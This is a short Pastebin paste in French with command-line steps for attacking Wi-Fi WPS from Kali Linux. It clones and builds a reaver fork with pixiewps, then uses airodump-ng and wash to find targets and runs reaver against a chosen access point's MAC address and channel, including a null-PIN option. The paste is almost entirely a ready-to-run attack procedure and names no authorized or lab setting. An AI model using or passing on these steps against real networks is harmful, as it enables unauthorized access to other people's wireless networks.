Advertisement
Guest User

Untitled

a guest
Aug 20th, 2017
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. Dans un Kali linux (accés carte par pont internet)
  2.  
  3. Installation:
  4.  
  5. git clone https://github.com/t6x/reaver-wps-fork-t6x
  6.  
  7. sudo apt-get install build-essential libpcap-dev aircrack-ng pixiewps
  8.  
  9. cd reaver-wps-fork-t6x/src
  10.  
  11. ./configure
  12.  
  13. sudo make install
  14.  
  15. Utilisation:
  16.  
  17. sudo airodump-ng wlan0
  18.  
  19. wash –i wlan0
  20.  
  21. sudo reaver –i wlan0 –b [macAdress] –p “” –vv –c [chanel]
  22.  
  23. “” == pin WPS à null
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement